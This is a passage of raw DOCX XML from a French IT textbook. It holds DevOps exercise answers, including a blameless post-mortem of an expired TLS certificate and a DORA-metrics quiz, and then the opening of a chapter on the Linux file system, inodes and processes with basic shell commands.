          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ORGANISATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un certificat expiré a rendu le site indisponible 40 minutes.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Décrivez la chronologie.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Identifiez les garde-fous absents.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Proposez trois actions datées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 46.3 — Choisir un premier chantier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   STRATÉGIE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Votre équipe déploie tous les deux mois, avec quatre heures d'arrêt.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Calculez le coût de l'attente.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Proposez un objectif à trois mois.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Définissez l'indicateur de succès.</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46.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le délai se mesure du commit à la production, pas de la fin du développement au déploiement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'étape la plus longue est souvent l'attente d'une validation manuelle, pas l'exécution technique.</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Pour chaque déploiement</w:t>
        <w:br/>
        <w:t>git log -1 --format=%cI &lt;sha-du-commit&gt;</w:t>
        <w:br/>
        <w:t># ... comparer avec l'horodatage du déploiement</w:t>
        <w:br/>
        <w:t># Reporter dans un tableau : commit | déploiement | durée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 46.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Incident du 12 mars — certificat TLS expiré</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Chronologie</w:t>
        <w:br/>
        <w:t>- 08:02 — premier signalement utilisateur</w:t>
        <w:br/>
        <w:t>- 08:09 — alerte de supervision, prise en compte</w:t>
        <w:br/>
        <w:t>- 08:21 — cause identifiée</w:t>
        <w:br/>
        <w:t>- 08:42 — certificat renouvelé, service rétabli</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Causes</w:t>
        <w:br/>
        <w:t>Le renouvellement était manuel et la date n'était suivie nulle part.</w:t>
        <w:br/>
        <w:t>Aucune alerte n'existait à J-15.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Actions</w:t>
        <w:br/>
        <w:t>| Action | Responsable | Échéance |</w:t>
        <w:br/>
        <w:t>|--------|-------------|----------|</w:t>
        <w:br/>
        <w:t>| Renouvellement automatique | Équipe plateforme | 20 mars |</w:t>
        <w:br/>
        <w:t>| Alerte à J-21 et J-7 | Équipe plateforme | 27 mars |</w:t>
        <w:br/>
        <w:t>| Test de disponibilité externe | Astreinte | 10 avril |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La chronologie distingue la détection, le diagnostic et le rétablissement : ce sont trois délais différents à améliorer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque action a un responsable et une date, sinon elle ne sera pas faite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 46.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un déploiement bimestriel de quatre heures limite à six livraisons par an : chaque correction attend en moyenne un mois.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objectif réaliste : un déploiement hebdomadaire automatisé en trois mois, sans augmenter les incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Indicateur : durée du déploiement, nombre de déploiements, taux d'échec, temps de retour arrière.</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 désigne le DevOps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 poste dans l'équipe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Un ensemble de pratiques culturelles et techniques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Un outil de déploiement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Une certification</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Quelle métrique DORA mesure la rapidité de rétablissement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Fréquence de déploiement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Délai de livraison</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Taux d'échec des changements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Temps de rétablissement</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Pourquoi éviter d'utiliser DORA pour évaluer des individus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Les chiffres sont faux</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Cela détourne les comportements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Ce n'est pas assez précis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C'est trop coûteux</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Quel est le rôle d'une équipe plateforme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Déployer à la place des équipes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Rendre les équipes autonomes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Surveiller les développeurs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Écrire la documentation</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 contient un post-mortem sans blâme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Les noms des responsables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Une chronologie et des actions correctives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Une sanction</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Un rapport financier</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Le DevOps est une culture et un ensemble de pratiques, pas un rôle isolé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le temps de rétablissement mesure la durée entre l'incident et le retour à la normale.</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Les métriques perdent leur sens dès qu'elles deviennent un critère d'évaluation personnelle.</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Elle fournit des outils et des parcours en libre-service.</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Il documente les faits et les garde-fous à ajouter, sans accuser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>47. Linux : système de fichiers, processus et droits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le modèle mental d'un système Unix, sans lequel chaque commande devient une incantation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Débutant · Prérequis : chapitre 46</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Se repérer dans l'arborescence normalisée.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Identifier et gérer les processus.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Comprendre les droits et les appliquer correctement.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Monter et vérifier un espace disque.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Lire les journaux du système.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>47.1 Tout est fichier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unix expose matériel, périphériques et processus sous forme de fichiers ou de flux. Cette uniformité explique la puissance des outils en ligne de commande : ils lisent et écrivent des flux, quel que soit leur producteur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre fichiers qui ne sont pas des fichiers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/dev/null      # puits : tout ce qu'on y écrit disparaît</w:t>
        <w:br/>
        <w:t>/dev/zero      # source infinie d'octets nuls</w:t>
        <w:br/>
        <w:t>/proc/cpuinfo  # informations matérielles, générées à la volée</w:t>
        <w:br/>
        <w:t>/proc/1234/fd/1 # sortie standard du processus 1234</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INODE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Structure du système de fichiers qui décrit un fichier : droits, propriétaire, taille, dates, blocs occupés. Le nom du fichier n'est qu'une entrée d'un répertoire qui pointe vers un inode.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un inode observé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stat rapport.txt</w:t>
        <w:br/>
        <w:t>#   File: rapport.txt</w:t>
        <w:br/>
        <w:t>#   Size: 1024       Blocks: 8          IO Block: 4096   regular file</w:t>
        <w:br/>
        <w:t># Access: (0644/-rw-r--r--)  Uid: ( 1000/  alice)   Gid: ( 1000/  alice)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>47.2 L'arborescence normalisée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La hiérarchie est standardisée par le FHS (Filesystem Hierarchy Standard). Savoir où chercher fait gagner un temps considérable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.163 — Sept répertoires et leur rôle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189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Chemin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="348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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="363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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1890"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/etc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3489"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fichiers texte, versionnables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="189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/var</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="348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Données variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="363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Journaux, bases, caches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1890"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/usr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3489"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Programmes et bibliothèques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lecture seule en usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="189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/home</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="348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Répertoires personnels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="363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Données des utilisateurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1890"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3489"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fichiers temporaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Effacé au redémarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="189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/opt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="348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Logiciels tiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="363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Installations autonomes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1890"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/proc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3489"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>État du noyau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Système virtuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six commandes de repérage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Se repérer</w:t>
        <w:br/>
        <w:t>pwd                        # répertoire courant</w:t>
        <w:br/>
        <w:t>ls -lah                    # détails, tailles lisibles, fichiers cachés</w:t>
        <w:br/>
        <w:t>tree -L 2 /etc             # arborescence sur deux niveaux</w:t>
        <w:br/>
        <w:br/>
        <w:t># Chercher</w:t>
        <w:br/>
        <w:t>find /var/log -name "*.log" -mtime -1     # modifiés depuis 24 h</w:t>
        <w:br/>
        <w:t>find . -type f -size +100M                # gros fichiers</w:t>
        <w:br/>
        <w:t>locate nginx.conf                         # index rapide (updatedb)</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L'ESPACE DANS LES NOMS DE FICHIERS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>rm rapport final.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> supprime deux fichiers. Citez toujours les chemins : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>rm "rapport final.txt"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>. Préférez des noms sans espaces ni accents dans les scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>47.3 Les processus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un processus est un programme en cours d'exécution, identifié par un PID, avec un parent, un état et des ressources. Tout descend du processus 1, lancé par le noyau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
